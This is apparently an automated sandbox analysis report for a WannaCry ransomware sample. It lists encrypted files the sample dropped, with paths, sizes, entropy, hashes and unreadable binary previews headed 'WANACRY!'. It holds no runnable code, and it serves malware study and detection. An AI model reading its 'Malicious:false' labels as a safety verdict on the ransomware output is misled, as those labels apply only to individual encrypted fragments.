                                                                                      Preview:WANACRY!....r.. ..I.k.)k.{....]..ZEz"8..\Y=3........B.t..m....V[..JMn0.3..>........T..k|..E..l8...v&._....p...R...6.3...?.}0..{..T.e.._....)......L.?...pj.i...1b...&7a8W.+....]Oq..........%=Db......p....9.ea.#.f....ra.........._@.*.......WO-..'L.k&\...............@....:..Hg.^.}x............Ny ....W-..hp..9..^.E.+.%....{.a.?u!{.iW}.*.....n...?8q........V[.h./(.,}.Rc......-...]..Os~%...M...f....y<..T...z'..f.J0?.F....N.................;..}.........9..}...{..%z..*Hr....".z...'...Q..i"..<....G..\..f'.... .r...pV.y..v.....pA`0p..'...R.G....v..N.y.Q...#......R......n[..tS.J......\Rb$....VH..=............fy,..z.3RA....._.+..H.o.G!B.......u..M..f...qy.=..t...42.\.E.>.!.'..}....cx..]#.......^.;....A.....[o%.\.[....v.r....~..4...4.x>{j..J>....A...-.Y..`h...u..&.$G%hv..4]7..MH=x.\'.....f.uy.n.c..(.L.....P.....2F.-..Q.[f.d..<..{crh..[q=. .....E../.m..G...*h....[..@.t>=.z..~.8......j..j2{..q..i."XXA.'.C.C......~j.6_...`.;R8...qc..."..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.820119962376173
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkCCxsxOUYpP5ly8PWvbBVjFp5m6OQnkcCoqpI4hbXYH6XXf759chCV0twOm:bkCYsxOTy8+vbBVjnOVoqpIQb3+u0tI
                                                                                      MD5:0429E14391BC333FAA2826E3A0D8980B
                                                                                      SHA1:649D946886170B0A11095C4383CBC7BDE69C251E
                                                                                      SHA-256:5F86A8C568D9ABB42A4FED77727AE4AC0FA55C72AC9AAA3FDB0525BC2513E838
                                                                                      SHA-512:577938A6BD9CD8C0FC67ECA978176604D73056F7113C0CA52277DAC2BA65C9396918E09BF18501D2E4CB9074462125C96FBFC76B97D85729112DF7DA0E3B90C7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....r.. ..I.k.)k.{....]..ZEz"8..\Y=3........B.t..m....V[..JMn0.3..>........T..k|..E..l8...v&._....p...R...6.3...?.}0..{..T.e.._....)......L.?...pj.i...1b...&7a8W.+....]Oq..........%=Db......p....9.ea.#.f....ra.........._@.*.......WO-..'L.k&\...............@....:..Hg.^.}x............Ny ....W-..hp..9..^.E.+.%....{.a.?u!{.iW}.*.....n...?8q........V[.h./(.,}.Rc......-...]..Os~%...M...f....y<..T...z'..f.J0?.F....N.................;..}.........9..}...{..%z..*Hr....".z...'...Q..i"..<....G..\..f'.... .r...pV.y..v.....pA`0p..'...R.G....v..N.y.Q...#......R......n[..tS.J......\Rb$....VH..=............fy,..z.3RA....._.+..H.o.G!B.......u..M..f...qy.=..t...42.\.E.>.!.'..}....cx..]#.......^.;....A.....[o%.\.[....v.r....~..4...4.x>{j..J>....A...-.Y..`h...u..&.$G%hv..4]7..MH=x.\'.....f.uy.n.c..(.L.....P.....2F.-..Q.[f.d..<..{crh..[q=. .....E../.m..G...*h....[..@.t>=.z..~.8......j..j2{..q..i."XXA.'.C.C......~j.6_...`.;R8...qc..."..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.832957597413935
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:o2Sichhtj+8PmJWWELbEM74aI9MEYS5EUhRQA:obhT+skELbZxI9MR2E/A
                                                                                      MD5:DF05A73B7D8CB7904FBC4275FEDD4C9B
                                                                                      SHA1:C315136656E5FB68F8AE6BA31BC3D79F5FD32FB0
                                                                                      SHA-256:D61140EEEFC1AB891ABDF920C09E8E0D1ED9E28B71AB65C87827E08212878F82
                                                                                      SHA-512:5A4720467D06E67932D619756D8AD695372CFED35B9233F63794AB0299591EB520000B0496A6E4AD5CF5C02D0182A7E01534454BB9D7EDC9BA677C30C42EB624
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:/.\4...@1.38.Y].....O......p.g._.B}...7.X....0.G..W.|.MT.E.Ep>T9..t/.Z0...V1............a....W.l.o~.BH..C9..3.o`N_K|..7.%a......8...S..yM.....)..w.CC[..,&%<......%.V@'...7.P.N.|....,5M]r...."...V.*....~.T..m..=.<..n_....W..\.u.AR.2Yw.\N..o.(.'0(.`...{..s.F...#..s.W>U..7...$...d...........bW..<..m.5.q..|%1.}.}...M@D.>...2Yq.a[..3i{.I|.@.L8P..=..Ux..5#BR..H...U......{.r...O]Q.[.<n.K.>....Z..?...N.;..</....t....@.}....e..$A.....2.E.....R.-*..j.7:I.....\:Ow.5..s.GoLP3..c...w.*.C...._y..D...H. $.*'U#\._.s0....W.V.....h.Ype.U.........5...1.kW:..u..w.G*.[..U.$.Q....p..+.1.p...YYQ.......k .k.G.......z.:..t..P......YMH..*..!u6.k..U.3.8..k.B"....\<......E...E..U.*b..J}]h..B4r..TL..._.....).jQ..3).....&....)`.l.].. ..S.m.z.z...Y,,@.B4K._k.y.{....Q......<|.......i4....K]..m*.0..C.>...Xh.vG.....',].k....w..^.xj?Z1.....g,...y.......zP.f.E?KQ..y.3..|~...2.... i..SfZ!T.C1#.....D.T[...38.....d......$R.{.C......A.......nd....P.B.<.6.s9.lW.....LY.).~....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.847956947096822
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkM/Kl/fpmmrgg9zimVFyT8S1cVnNesrKRZnhl6DSRZZHAPo7a3VJtqTJlkQUpKT:bkm3hmnIvuVnEJdJHAoIVnqL+pKeuJ
                                                                                      MD5:70DB481E7E22772A12C146475A2566EC
                                                                                      SHA1:B5C4092F6492A0BA76C8341E5F63F39D54261AD5
                                                                                      SHA-256:527B2FFA29725888A0346D1568238B7A01776FEB3706A836291BD00A06310747
                                                                                      SHA-512:D9A2FDD391A50DE9C58239BC9632D448102297D5517BAEAF8C13DC0C11AC090CEBE66E34EBE380680CBB23A4CEF2645DA12074ED7D7992CD7B9F7684CC41F0F3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......u..S..D..-.....=...kB.....VT.... pI....e...?,=[..a......o.C2\\.r.28[0.u.U`ZR.a.0\9%..+nM....O.7.d@.-..Ig..*9..kj)....L'e.91e...{U.....G..`4...Fe..s...;.......o...wL..._Y~>.:.L..Z.Y.E}..Z....L.....H.>...y.....b...1k.6..v..eH......,.#.Z...G..'.S.............Z..K.3s.p...j/}o.bV.G.w.L...).......a*A..8.v."-.....)X.n........n.E-Q..;..-....Ls9........-..Mpo../:..{.1.i:o......".q..8g.~..f.z.T.&...TS5[...`X.#...H.vj...i......%J..,U.m.D.V...y...<H.~..V*...G.r..4..>...E.9^.f..'{....i.l......B......me..g.V......&.......0...BQ.......&$.e.YG.....lw.p"+..-...U\..k.x.... .{J...Ai..f,\(.. .M..]..0.Q.*.B...`.\.R.\U?.B..rfux...;..;..^{K...t....7.v.......Q.G.C....L..Z.[..u......e..5....O..0...n....|...$B.....7...C.`:....e.#:...N.Nk.@x..O..>.L.1^/.."..;.G..z..~`.P.g4....x...`......[V.4..7..u...^|..........w;.$..2=[...=....Lm.e5h.>...].tdo..\...I.X.CnU.>n.G.Vj.....\=...+..;z.l...,..+.C;.u...hhf\..`....P...u...PY.f..(..........G..&M..V:zE..6.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.847956947096822
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkM/Kl/fpmmrgg9zimVFyT8S1cVnNesrKRZnhl6DSRZZHAPo7a3VJtqTJlkQUpKT:bkm3hmnIvuVnEJdJHAoIVnqL+pKeuJ
                                                                                      MD5:70DB481E7E22772A12C146475A2566EC
                                                                                      SHA1:B5C4092F6492A0BA76C8341E5F63F39D54261AD5
                                                                                      SHA-256:527B2FFA29725888A0346D1568238B7A01776FEB3706A836291BD00A06310747
                                                                                      SHA-512:D9A2FDD391A50DE9C58239BC9632D448102297D5517BAEAF8C13DC0C11AC090CEBE66E34EBE380680CBB23A4CEF2645DA12074ED7D7992CD7B9F7684CC41F0F3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......u..S..D..-.....=...kB.....VT.... pI....e...?,=[..a......o.C2\\.r.28[0.u.U`ZR.a.0\9%..+nM....O.7.d@.-..Ig..*9..kj)....L'e.91e...{U.....G..`4...Fe..s...;.......o...wL..._Y~>.:.L..Z.Y.E}..Z....L.....H.>...y.....b...1k.6..v..eH......,.#.Z...G..'.S.............Z..K.3s.p...j/}o.bV.G.w.L...).......a*A..8.v."-.....)X.n........n.E-Q..;..-....Ls9........-..Mpo../:..{.1.i:o......".q..8g.~..f.z.T.&...TS5[...`X.#...H.vj...i......%J..,U.m.D.V...y...<H.~..V*...G.r..4..>...E.9^.f..'{....i.l......B......me..g.V......&.......0...BQ.......&$.e.YG.....lw.p"+..-...U\..k.x.... .{J...Ai..f,\(.. .M..]..0.Q.*.B...`.\.R.\U?.B..rfux...;..;..^{K...t....7.v.......Q.G.C....L..Z.[..u......e..5....O..0...n....|...$B.....7...C.`:....e.#:...N.Nk.@x..O..>.L.1^/.."..;.G..z..~`.P.g4....x...`......[V.4..7..u...^|..........w;.$..2=[...=....Lm.e5h.>...].tdo..\...I.X.CnU.>n.G.Vj.....\=...+..;z.l...,..+.C;.u...hhf\..`....P...u...PY.f..(..........G..&M..V:zE..6.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.814087236401316
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:o8MsPZVGD8bP4P2IR1IldB+jfjL1/25iBiObn9ooVJuNI6Um:o8MsPGDu4PPjedsff1/25i8Or9DuNI63
                                                                                      MD5:C99C62384FA540B0A50212B4C1BCC583
                                                                                      SHA1:ED4BE905009EA98B2D43164737398B38964454B9
                                                                                      SHA-256:6DA14212DCB5C5BDDA53B680029BA26E66600988103AA2501289BC36F6030F29
                                                                                      SHA-512:D2BB9A85F83060BDC634298F5C9FBF16473F9E848736A0EF54D90D6142D6F49950AA33D2181B62FF732AABB9746900D7C255A70041987696A008EDD96C0B5FEC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.5 ...:dT.j.-AA ....]..4..W..W.B...R.?.oC.q..?.....p5...[<.4 `.....}..]+=...lt...I......->!....M../..ME...mQbJZ..X.....A.vr.I|X2..<....,1."..|r...........czG...>.+..R.=.l.y.+.......*..&..:f.....]...sl.Ud0b....M.\...W'..a..a...eQ....._.!.....}....]k..Fo.jc.J......A.....OFX....dV|k..O.../..F2w.r..v<L...(>f.O..,.oU.....*`.h1.+.....I...:z.S.0.@.r..Mm).u.0......1)c.....tG|.<.7...2Y........./R8...B...3.Z,>...%..1....\?,..).#..A...9:t[......t......F.w!....V...$.......I..0(..C..Z.a.|q...c.vG..?"...K...#8?.D......L.D.1v/..^d..e...Ze..^.T./...Z...C...$....A.....9....y..a\.l.j.&...X.m...@.B.`pb.L...t...SQ3.d.......#........o..K..Q...?q.&LI...\j..S..z...;..S.W...z...s...4.>...Su..4...."%B....7........l..G.f&..K.|.F....iB...j.`-+..+Y^!M.{.;.....^.i/....5...V.D.8.#4nC_.N..g..n.5....XP./..0..=~....VX...n."!...O2.j7%.Y.....<vN:..>.....ah<...pv..N...;Jk.x.&I..}.M..9.cO.....k.5n.xR......b.yL+....yMv.h..+[.U....o...8.S.........'..l5c.g......`.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.840530294519313
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bklz0UsXmY8uourKw4OMkqsTka57ngIoPKQ4MHuItzbnEKT+h:bklAUsXKwrJEk1P5gIonzDEG+h
                                                                                      MD5:AA90F6C809F1AAC23F54ACC6785A6554
                                                                                      SHA1:647C262C3BEBE03E079EE26690F6B9A8231F15BA
                                                                                      SHA-256:DBCA68D32BDFBF9BE5A9F1873254F14CFF149191B7C01F94F672C2AC3B12D477
                                                                                      SHA-512:E02E958C8A8C28FA798AE6E4746A7304D9F15C8E4E2C4092B51CA154FBD9CFCFB5E7AEDF2D6AF44F1DAB693B6570AB67E35531E84BBC1AEBD9738685372015B1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....(R...h._'...\..b.5.....IW.$y.....D. ..5........zP?.....<.y.H.M."r.(..5...2[...5&[....dV..I...oF&._.j.2....9...$l.JO....,[.......M...4...G6. W...8.nZTV....@=..|....\..m..=.)..p.g.........U.vF.....N.Gv.......zV..5.@5.k.G.+;H."..C.........L!%.q)b..................#.H..'>.........db..=u..Z....V9....a...];.f.....{U......?.).G...........nR.B..U.bq..{.|y.g......<...K6.....T..R..B.A.J..^N...B.96.X}..'tDU..$_.!....c..e.l.....H|=1T.*..)....W...+.m.W.w_qn.-$P..7eJ#)ey+.{..x..,z....w.8....7..(...i.U.v..%.......3<A..h.(+..v.....O..A+.s..-..Ha.........e.........o....>j.S.01it1.gm...6B.i..I..G"Y...>...L......:.(..#..N.&[-1.{..$/o7.~h..../;..{........$..x....%t....w.....k..*..,...B.)."...iJ:..1.A2..;....V.....*#...|.T...\.c+.b;y.<..z..5.....T..^..<.V.(.[......&.&.y........2..c.....(M=...wPV._...=zaH.|..4.....617......d..Rk..^...[Wj.O....]PV..;.j..S.,.[%.{f.Q..~.i...|.7.7..`.].2.....@x.N.{...6....R.'...Q...4d. .+`.._!..3g.:..gk..F..m.sgB
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.840530294519313
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bklz0UsXmY8uourKw4OMkqsTka57ngIoPKQ4MHuItzbnEKT+h:bklAUsXKwrJEk1P5gIonzDEG+h
                                                                                      MD5:AA90F6C809F1AAC23F54ACC6785A6554
                                                                                      SHA1:647C262C3BEBE03E079EE26690F6B9A8231F15BA
                                                                                      SHA-256:DBCA68D32BDFBF9BE5A9F1873254F14CFF149191B7C01F94F672C2AC3B12D477
                                                                                      SHA-512:E02E958C8A8C28FA798AE6E4746A7304D9F15C8E4E2C4092B51CA154FBD9CFCFB5E7AEDF2D6AF44F1DAB693B6570AB67E35531E84BBC1AEBD9738685372015B1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....(R...h._'...\..b.5.....IW.$y.....D. ..5........zP?.....<.y.H.M."r.(..5...2[...5&[....dV..I...oF&._.j.2....9...$l.JO....,[.......M...4...G6. W...8.nZTV....@=..|....\..m..=.)..p.g.........U.vF.....N.Gv.......zV..5.@5.k.G.+;H."..C.........L!%.q)b..................#.H..'>.........db..=u..Z....V9....a...];.f.....{U......?.).G...........nR.B..U.bq..{.|y.g......<...K6.....T..R..B.A.J..^N...B.96.X}..'tDU..$_.!....c..e.l.....H|=1T.*..)....W...+.m.W.w_qn.-$P..7eJ#)ey+.{..x..,z....w.8....7..(...i.U.v..%.......3<A..h.(+..v.....O..A+.s..-..Ha.........e.........o....>j.S.01it1.gm...6B.i..I..G"Y...>...L......:.(..#..N.&[-1.{..$/o7.~h..../;..{........$..x....%t....w.....k..*..,...B.)."...iJ:..1.A2..;....V.....*#...|.T...\.c+.b;y.<..z..5.....T..^..<.V.(.[......&.&.y........2..c.....(M=...wPV._...=zaH.|..4.....617......d..Rk..^...[Wj.O....]PV..;.j..S.,.[%.{f.Q..~.i...|.7.7..`.].2.....@x.N.{...6....R.'...Q...4d. .+`.._!..3g.:..gk..F..m.sgB
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.8384707308472885
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:57OyNKj+qtNWKVWomEjmJ7jyAI9A2bhfq+x20rR:yj+qzBZjMqNbE+x2YR
                                                                                      MD5:33D315C5C0CD8312F1CCC6F3E90DA013
                                                                                      SHA1:3DC7ABDEA02E7EAB319284076E2FBA92777582FF
                                                                                      SHA-256:8E4F2EB6FA3FCA15271CABDE2254959DA0D0541957CB24E4CD06A6CBCB1EF390
                                                                                      SHA-512:88AE56BC1FD855323CCD74C6BFB92E655A616EF9AFCAEE0B8459FAE5B9E8F203ADE04E0A22A5651279E59AF26C43B452B14D485A682D431828EA14FAF8B8462D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.*....\1[..w[2.f.9...p.2..\(.=u%;s.........`L...x..H$.}%l...W..l|..".........#.$|%2t`.^.{....r{."i..?).u4C=N.q..Fa....Q...*1..e.!.V...mWs..~.3_.......J|%.;..O....;....0dm.w..@......b.w..@.J..S.7.]!w.e.......Z......$...q...*.c.#..'.f.j.5...Z.... ................-.Jj.i...$...N..o<..O....wh.J.<3Z.w..x@.hW?#0.k.../..t..In'.d.9...f..QF......$.zze....'.....#....16.X....Jv.X.B..}.)3..........I.........m..2.%8.bvw}..rh.:.....Z.T..0......2N..'.n.1....eX...o....wZUm;....3(zK5........V1...i..*BM..d..v,..o|.bM...... ....o.6..........V.y~... .d.!.g2A.!.r.w<..R........t..C.j....E....l..~@.....0.T..ju.9...;...*.W5.u...(......L..=..,....-N..?.....aPo...4wt....X.[\.@{..O..]...R....{.Cek\..<.5...G}.|.4O.....*.I{#.w.<]f...u....+'~p...k:.;......'[...L..4...(......U....)....TY.....n[.=....`.'..d(...".#.`.-.L...S%.ZM...........a......C.5.s...;Rt1Y .<*.K...N../C..I.)..%.MfL`..)\S.....2"..x....2...K....Y...}..P.H.V..L.vi3.}.M.........Z..#Q.Tm..Q......t..Py{>0.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.841783675801671
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkDsnYwJMLhQjY+Ms55ei0/ihdQc8h+kyBXiHNS9EPnK8sruJreZjk4pT5mKfB9V:bkDsXahQjH5QHanuh+kyeNS9EbJKO8Rv
                                                                                      MD5:7857D23A8B0F9496DCD848A8E2B4C6DD
                                                                                      SHA1:F0366D5708FA76AE1A0D4002E3C4E668670DF596
                                                                                      SHA-256:DC79EE395E664FCFDEF0206D4C9FBFA7D80CC91F0E9F1059E92732C3D4C5A7C4
                                                                                      SHA-512:B164AC0AAD1199D345808242828FA0E9B98F94DB943F582A66F91999EFBCC18C126403591F6543F4EC1F3FC0CB77D59BA883556B7F8840FCACCAA428BF28BB7D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....3+.....[..< P.!...eTt...[`3..t_.Ut...e,.[..@.....F.M...O......M...iH..(.t]r. ..}z....n.........5...4.U..9.}.5P....]=..o.j1..Q,M....#;....v..8...B...'^...."3}./....`y.K...V.....qy5>......h.)H...V:...8.r...4........`...G.0......W.eL..-.../...............; 1.k..0..5]..2...n..eJ......9..9.......'..-....d.[L..........[.f#....-.,.jI..ILbu..x..B..K...=..U..T.(.D..ko.cZ...,..(.......@.0..XP.s.~.p..a'...:...8...m(%.k...o...(....e.e...L..i,q..'0s../*.w..[....9\'......c.o..7...l>..C..;.k.x..x...Z:..;.\UF...[........_.....23...RM..8..)[...1@.S.l.5~._.n.d....."xy..l.....w{..@..".. .....I.~.k.i./WhZ..".U..Y...gr..Q..T..w.>.S..c7.l..tA)._D.....}?(q?......5A......m..9.cB@.[1DS.&...A._`......@F...^&ATB...,....B.Z.........`...Tt..F..(.#.f.1E.;t..I.HE..-?.6.D5..n.Y...f1l.{..*{'...%k*e...(....y.T.{..zV.@.....$0.Q]..=>.wX...H..z.E.P....y..{.. ~K....^Ge.R...9.='.p...^...aU..=..(.|.'....e\...}.j.........L).^.[.......+.o.jE.bJ..(.j..h.....(...H..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.841783675801671
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkDsnYwJMLhQjY+Ms55ei0/ihdQc8h+kyBXiHNS9EPnK8sruJreZjk4pT5mKfB9V:bkDsXahQjH5QHanuh+kyeNS9EbJKO8Rv
                                                                                      MD5:7857D23A8B0F9496DCD848A8E2B4C6DD
                                                                                      SHA1:F0366D5708FA76AE1A0D4002E3C4E668670DF596
                                                                                      SHA-256:DC79EE395E664FCFDEF0206D4C9FBFA7D80CC91F0E9F1059E92732C3D4C5A7C4
                                                                                      SHA-512:B164AC0AAD1199D345808242828FA0E9B98F94DB943F582A66F91999EFBCC18C126403591F6543F4EC1F3FC0CB77D59BA883556B7F8840FCACCAA428BF28BB7D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....3+.....[..< P.!...eTt...[`3..t_.Ut...e,.[..@.....F.M...O......M...iH..(.t]r. ..}z....n.........5...4.U..9.}.5P....]=..o.j1..Q,M....#;....v..8...B...'^...."3}./....`y.K...V.....qy5>......h.)H...V:...8.r...4........`...G.0......W.eL..-.../...............; 1.k..0..5]..2...n..eJ......9..9.......'..-....d.[L..........[.f#....-.,.jI..ILbu..x..B..K...=..U..T.(.D..ko.cZ...,..(.......@.0..XP.s.~.p..a'...:...8...m(%.k...o...(....e.e...L..i,q..'0s../*.w..[....9\'......c.o..7...l>..C..;.k.x..x...Z:..;.\UF...[........_.....23...RM..8..)[...1@.S.l.5~._.n.d....."xy..l.....w{..@..".. .....I.~.k.i./WhZ..".U..Y...gr..Q..T..w.>.S..c7.l..tA)._D.....}?(q?......5A......m..9.cB@.[1DS.&...A._`......@F...^&ATB...,....B.Z.........`...Tt..F..(.#.f.1E.;t..I.HE..-?.6.D5..n.Y...f1l.{..*{'...%k*e...(....y.T.{..zV.@.....$0.Q]..=>.wX...H..z.E.P....y..{.. ~K....^Ge.R...9.='.p...^...aU..=..(.|.'....e\...}.j.........L).^.[.......+.o.jE.bJ..(.j..h.....(...H..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.825868176832101
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:p3K/0rvJw2bG+tI0nCxufCxMA1ezWukBcu+XoIxn:p3K/0rSaG+4sC4q8ucNn
                                                                                      MD5:1B55D5A604DF938F35BCA166B777FA60
                                                                                      SHA1:83C586A11E9A372BEE03B6B4234EDCB6FE5CE8DB
                                                                                      SHA-256:DAA745F509B95D6E31C536DBC70CA2E1EEDA7263C474D960ABD5216E8F17C287
                                                                                      SHA-512:769DC18EA3EA09217E03509295570FF74FD89C0A061861BF4984430B24F4A772E9D9C36DA302ED40AB5A27E173CD129577EC0998C224CEEEBBAE91080DA517FD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:....U4...z.....jm..@.....Do...6.....Ip...Q..c..s4v....N.(.....P..)Oe..hGe.N.N}...rp....J.....?..t:...|M.3..[.S.....I{.%..........*#V:.A.A.g...YC....@..O-.h..s.........Tw.TPL.Pc.".Y...(v..+;eB.,i..dZec.W....H.T.q.5.0N..-..sV..D`... .>O.......:4|.1.I&....W.r.a..:.....X.uY...H...&..C......N ,...x.....lk..;....F9;.....RkH|s. .+m..mD.4..;&.\Sq"8...f..NG....t.....i.|E.R....eqj..f...u8.....[a.u....U.Q...?7.xi.n...t...;.....G?G.9..!...pg>.f+..\}b.x.^iI... ...6.C.&P.<...s^H...Z.o.u\.3{.3..._\.)...-_..9v.."...p.M.....*/`.....G..x.#D...PS..w...#E`9.....ao=......BXU..]......4n...=......N.....&....o#..A..X2C."|.s,........bz.?..m2....(...[.5..e.y.......M34..}.8.`...WqIl...+k..B.........|..?<.P...|.Ih......M.......eU@..Rc;/....6......<>X...<..Pg....db....8......J.).R.eZdg%.('U.j.~E...z;.o(..&......5....%.N.o..5..^.Q......;.4E.}.m.L..^.i..9.....B.<P1J.v)@:....at....w........L....S..$4([-...$t.....w..4.....T.P;p.u3&.5...q..7.3c..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.864185216704514
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkUPq2GTVsv9AFUEUGOuNBNN9uNDpzXFNM3ab15h52ZYp9N/SQKlPPGgqIJ1U5Xt:bkUibTY98x9NbuNDp7TVg4SdPjJ65FTL
                                                                                      MD5:99814687E7AB063162075AF9DB0EF40D
                                                                                      SHA1:73E525BEA1338946B3D897B52E4776A3D3714927
                                                                                      SHA-256:473603CC8DF9C5F715269B501AAD3495099C46D51DC59769ECB399FB3E2A2E67
                                                                                      SHA-512:263982AC75F36B0FFB0EAD1B774E9CB6C7164C6D1A3BC1CA7DEDEE8B77578C207F06150F577B3DA3463305EECE6A52748F6DD23432B4354E9C95291283F73BA0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........4.a-....`v..7....;.9......2.YIy..*..OO.J.*3b'.L......;..2s..:.98...3R..^I..xy.A......%..........~^...X.[..!.."..."...9.j.y.F..C.M|F]M......^....R._...nO&...D.1..v/...}W..O..q.W.tK..)y..#)....3Igg.T.i2.......^(.1..b"...WC%..=.}.>...z..;<o............G.<.C.[h.Ohd...*&-..n.4..K..5.l.Q#..|Q.B...0.._....!..8...e....1.\../..\.Z..tY`a..Th.H3....H...(..;..3.O.....]s.....L...7.6/Jpv>.`..o....).....M:.x#.p..Y<..K.....L,2.......1._.}(.d......;.-c9.,?X.k{1....H....1.<..=us...h...D.|.xr...a1.A.........1.....}uU..Ic.q.\3...\!..9...H.%.YF.."......;e...6.[?...o..i..j....=iY(<..V.R..2.V._j...w....P..2m.JU...T..D..%b&/..8.[...;L....<..<~..E.............g......G..\..p....*...}R.7..Nr}y..#...>....z?.....A...f....Q,..88..GN.7y...$.d.i.d.?y..l...C/db....|>.Ky:V....Z.].......W.."I.u.....x..w...a'.....i...4...XL.UW.-.c@ib...C%...=.t.<<.Vr+1c...*............&..d..}.Ej..j.3..{.."P..."......].].i.m!4.D..n.../..<*.....o....]3.F.SD..b..|W+....l..\sk..s
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.864185216704514
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkUPq2GTVsv9AFUEUGOuNBNN9uNDpzXFNM3ab15h52ZYp9N/SQKlPPGgqIJ1U5Xt:bkUibTY98x9NbuNDp7TVg4SdPjJ65FTL
                                                                                      MD5:99814687E7AB063162075AF9DB0EF40D
                                                                                      SHA1:73E525BEA1338946B3D897B52E4776A3D3714927
                                                                                      SHA-256:473603CC8DF9C5F715269B501AAD3495099C46D51DC59769ECB399FB3E2A2E67
                                                                                      SHA-512:263982AC75F36B0FFB0EAD1B774E9CB6C7164C6D1A3BC1CA7DEDEE8B77578C207F06150F577B3DA3463305EECE6A52748F6DD23432B4354E9C95291283F73BA0
                                                                                      Malicious:false
                                                                                      Reputation:low
